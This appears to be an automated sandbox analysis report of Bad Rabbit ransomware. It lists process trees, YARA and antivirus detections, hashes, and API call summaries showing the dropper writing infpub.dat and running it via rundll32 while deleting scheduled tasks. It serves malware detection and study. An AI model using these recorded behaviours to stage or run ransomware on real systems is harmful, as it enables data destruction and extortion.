                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\dispci.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\dispci.exe" -id 3065482610
                                                                    Imagebase:0xdf0000
                                                                    File size:142'848 bytes
                                                                    MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 97%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN drogon
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN drogon
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:32
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff6eef20000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:37
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:38
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:40
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:44
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:45
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:46
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:52
                                                                    Start time:17:26:09
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:53
                                                                    Start time:17:26:10
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:55
                                                                    Start time:17:26:10
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:29.1%
                                                                      Total number of Nodes:86
                                                                      Total number of Limit Nodes:10

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 00C010F8
                                                                      • GetModuleFileNameW.KERNEL32(00000000), ref: 00C010FF
                                                                        • Part of subcall function 00C01000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 00C0101A
                                                                        • Part of subcall function 00C01000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00C0102D
                                                                        • Part of subcall function 00C01000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00C0103D
                                                                        • Part of subcall function 00C01000: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00C01044
                                                                        • Part of subcall function 00C01000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00C01060
                                                                        • Part of subcall function 00C01000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00C01071
                                                                        • Part of subcall function 00C01000: HeapFree.KERNEL32(00000000,?,?), ref: 00C01078
                                                                        • Part of subcall function 00C01000: CloseHandle.KERNEL32(00000000,?), ref: 00C01080
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 00C01172
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,?,?), ref: 00C01179
                                                                      • memcpy.MSVCRT(00000000,?,?,?,00000000,?,?), ref: 00C01192
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 00C011BB
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00C011BE
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01207
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C0120A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$File$AllocFreeHandleModule$AllocateCloseCreateNameReadSizememcpy
                                                                      • String ID:
                                                                      • API String ID: 796136525-0
                                                                      • Opcode ID: 5a408703817e7cdcaefa884f17487b310ab8d1d099b348e4f23a699191b5ca07
                                                                      • Instruction ID: bc49448e96db7803a070a8ae44cbb0c9a4d02928bd07f647fc2ee0ea576ea37a
                                                                      • Opcode Fuzzy Hash: 5a408703817e7cdcaefa884f17487b310ab8d1d099b348e4f23a699191b5ca07
                                                                      • Instruction Fuzzy Hash: 1641C6B1A001189BDB24DF65DC44BAEF7B9FF98304F054199EA0597291DA31DE54CFA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32 ref: 00C012DF
                                                                      • GetCommandLineW.KERNEL32 ref: 00C012FC
                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00C012FF
                                                                      • wcsstr.MSVCRT ref: 00C0133D
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00C0139B
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 00C013B5
                                                                      • wsprintfW.USER32 ref: 00C01418
                                                                      • CreateProcessW.KERNELBASE ref: 00C01479
                                                                      • ExitProcess.KERNEL32 ref: 00C01481
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                      • API String ID: 39178828-1758013632
                                                                      • Opcode ID: addb9b95cd78fc984df22131446f0d9db7b53873cca112e59206bfd13e977095
                                                                      • Instruction ID: e719c67b6125a1bd2eb21f636b5bc9a9f518363eec12f3bed8bb20fbfab97482
                                                                      • Opcode Fuzzy Hash: addb9b95cd78fc984df22131446f0d9db7b53873cca112e59206bfd13e977095
                                                                      • Instruction Fuzzy Hash: 7641A1719002189BDB28DF94CC95BEEB378EF44745F094299EE06D71A0EB709F64CB60

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 00C0101A
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00C0102D
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00C0103D
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00C01044
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00C01060
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00C01071
                                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 00C01078
                                                                      • CloseHandle.KERNEL32(00000000,?), ref: 00C01080
                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?), ref: 00C010A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                                                      • String ID:
                                                                      • API String ID: 2825476172-0
                                                                      • Opcode ID: 3ba3da0fae99e4cff5aabaff1aa47d79fcbc2f7c7b8dd8442a55aeea2c3eac23
                                                                      • Instruction ID: 7bea212d3a8393ad51f4f628accc66d3f941131012dacc82bba691a6124aaf49
                                                                      • Opcode Fuzzy Hash: 3ba3da0fae99e4cff5aabaff1aa47d79fcbc2f7c7b8dd8442a55aeea2c3eac23
                                                                      • Instruction Fuzzy Hash: 4D2151B2601214ABC730ABA5AC8CF9FBF6CEB45766F114155FA49A2250D6318940C7A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,00C013F0,?,?,?), ref: 00C01277
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00C013F0,?,?,?), ref: 00C0128F
                                                                      • CloseHandle.KERNELBASE(00000000,?,00C013F0,?,?,?), ref: 00C012A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Windows\infpub.dat
                                                                      • API String ID: 1065093856-2284094909
                                                                      • Opcode ID: 5ff51f42886e0609d62366c1fbb07f17db5ac1062712925e682f585b0e223026
                                                                      • Instruction ID: 4836befd4585c1a1875535e15e5d21dadb0ae9665f5b4a0eb7f8e57a3aa7ece3
                                                                      • Opcode Fuzzy Hash: 5ff51f42886e0609d62366c1fbb07f17db5ac1062712925e682f585b0e223026
                                                                      • Instruction Fuzzy Hash: 51F08CB6A012147BD7205B56EC4CF9B7EADEBC6BA6F064129FF14D61C0D6608D41C2B0
                                                                      Strings
                                                                      • invalid distances set, xrefs: 00C023FA
                                                                      • invalid distance too far back, xrefs: 00C02859
                                                                      • invalid literal/length code, xrefs: 00C025FE
                                                                      • invalid code lengths set, xrefs: 00C0215D
                                                                      • invalid distance code, xrefs: 00C027B4
                                                                      • too many length or distance symbols, xrefs: 00C0209C
                                                                      • invalid literal/lengths set, xrefs: 00C023B6
                                                                      • invalid bit length repeat, xrefs: 00C02345, 00C02351
                                                                      • invalid code -- missing end-of-block, xrefs: 00C02372
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                      • API String ID: 0-2665694366
                                                                      • Opcode ID: 8d4de91cbbbbe2c70e532ac4a629ae6eefebd1f25b769434e3dd4d0dc43206eb
                                                                      • Instruction ID: 24aa9efa9e2b52e56f1ed3c3f60774873c064d13a96d288dd04163e2427c671c
                                                                      • Opcode Fuzzy Hash: 8d4de91cbbbbe2c70e532ac4a629ae6eefebd1f25b769434e3dd4d0dc43206eb
                                                                      • Instruction Fuzzy Hash: 30626A71E00625DFCF18CF59C8946ADBBF2FF88311B1881AAD856AB385D7349A41DF90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
                                                                      • API String ID: 0-3633268661
                                                                      • Opcode ID: 0d4590bbe4d41cf94cf667bd9a175363810be3779f0e6613d7d983930e836cb3
                                                                      • Instruction ID: a52d291a14a49285eb55ce224270911fa62842064e8a88c4f828bf93fd65884c
                                                                      • Opcode Fuzzy Hash: 0d4590bbe4d41cf94cf667bd9a175363810be3779f0e6613d7d983930e836cb3
                                                                      • Instruction Fuzzy Hash: 30423BB0A00605DFDF19CF59C484AAEBBF2BF88300F1885A9DC55EB296D774DA41DB90

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                      • API String ID: 0-3089872807
                                                                      • Opcode ID: 94acd4526c3ba1b719390f946e2a4915412de87f4ddfdaca2e8cfa91ef8e1e75
                                                                      • Instruction ID: 63d0ecec351521c511e94500794d2414ef0799c4dfea250d6e0a0c3f25cef8c8
                                                                      • Opcode Fuzzy Hash: 94acd4526c3ba1b719390f946e2a4915412de87f4ddfdaca2e8cfa91ef8e1e75
                                                                      • Instruction Fuzzy Hash: 43122932A183818FDB15DE3CC58422ABBE5ABC4314F148A2DE8A6D7B80D371DF49D781

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C01566
                                                                      • UnhandledExcep.KERNEL32(00C04080), ref: 00C01571
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00C0157C
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C01583
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                      • String ID:
                                                                      • API String ID: 1999905405-0
                                                                      • Opcode ID: c0d0726c06ae35ab8b0d4ce00fa716c521157e8d037b8163fd75f39e164082b3
                                                                      • Instruction ID: 2ff413895d119ca7fcaa832486850d814427f8696795fab45d785eda3098dd3e
                                                                      • Opcode Fuzzy Hash: c0d0726c06ae35ab8b0d4ce00fa716c521157e8d037b8163fd75f39e164082b3
                                                                      • Instruction Fuzzy Hash: F6219DB5905604DBC740DF69FD8574C7BB4BF5C318B02C02AE68893260EBB0598ECF59
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d39eeb028271dddfdbac4f3bf1ab381d8d61b8aa8212f666553d0915efeae787
                                                                      • Instruction ID: d7428ca742b9eaf4cef022b8ef1d9c9de4a23da44787c04236417ad04bf12840
                                                                      • Opcode Fuzzy Hash: d39eeb028271dddfdbac4f3bf1ab381d8d61b8aa8212f666553d0915efeae787
                                                                      • Instruction Fuzzy Hash: D0716B717209829BD718DF1EECD072E73A2F78974074B8539DA05873A1C635EA22CAD4

                                                                      Execution Graph

                                                                      Execution Coverage: 16.6%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 26.5%
                                                                      Total number of Nodes: 1421
                                                                      Total number of Limit Nodes: 37
5146->5145 5148 48588cd 5147->5148 5149 485885d GetFileSize 5147->5149 5148->4932 5150 48588c3 CloseHandle 5149->5150 5151 485886c GetProcessHeap HeapAlloc 5149->5151 5150->5148 5152 48588af 5151->5152 5153 4858882 ReadFile 5151->5153 5152->5150 5153->5152 5154 4858899 5153->5154 5154->5152 5155 485889e GetProcessHeap HeapFree 5154->5155 5155->5152 5157 4858fc8 5156->5157 5158 4858f58 5156->5158 5157->4952 5158->5157 5159 4858fa1 VirtualProtect 5158->5159 5159->5158 5161 4857e86 5160->5161 5161->4967 5161->4968 5163 4856f9f 5162->5163 5164 4858313 FindResourceW 5163->5164 5165 4857edd 5164->5165 5166 485833a LoadResource 5164->5166 5165->4967 5179 48587e7 CreateFileW 5165->5179 5166->5165 5167 485834f LockResource 5166->5167 5167->5165 5168 4858361 SizeofResource 5167->5168 5168->5165 5169 4858379 GetProcessHeap RtlAllocateHeap 5168->5169 5169->5165 5170 4858395 memcpy 5169->5170 5171 48583b5 GetProcessHeap RtlAllocateHeap 5170->5171 5172 48583ab 5170->5172 5173 4858407 GetProcessHeap RtlFreeHeap 5171->5173 5174 48583c7 5171->5174 5172->5171 5173->5165 5184 485a790 5174->5184 5176 48583e1 5177 48583e5 5176->5177 5178 48583fa GetProcessHeap HeapFree 5176->5178 5177->5173 5178->5173 5180 4858809 WriteFile 5179->5180 5181 485882a 5179->5181 5182 4858823 CloseHandle 5180->5182 5183 485881d 5180->5183 5181->4967 5182->5181 5183->5182 5189 485bda1 5184->5189 5188 485a7d9 5188->5176 5198 485bd14 5189->5198 5191 485a7c9 5191->5188 5192 485a83c 5191->5192 5193 485a850 5192->5193 5197 485aed0 5192->5197 5194 485bb4f 5193->5194 5196 485ac8f memcpy 5193->5196 5193->5197 5194->5197 5209 485becb 5194->5209 5196->5193 5197->5188 5199 485bd21 5198->5199 5200 485bd33 5198->5200 5199->5200 5203 485c493 5199->5203 5205 485c4ef 5199->5205 5200->5191 5204 485c496 malloc 5203->5204 5204->5200 5206 485c496 malloc 5205->5206 5207 485c4ed 5205->5207 5206->5200 5207->5205 5208 485c4f9 5207->5208 5208->5200 5210 485bee1 5209->5210 5211 485bf21 memcpy 5210->5211 5212 485bf39 memcpy 5210->5212 
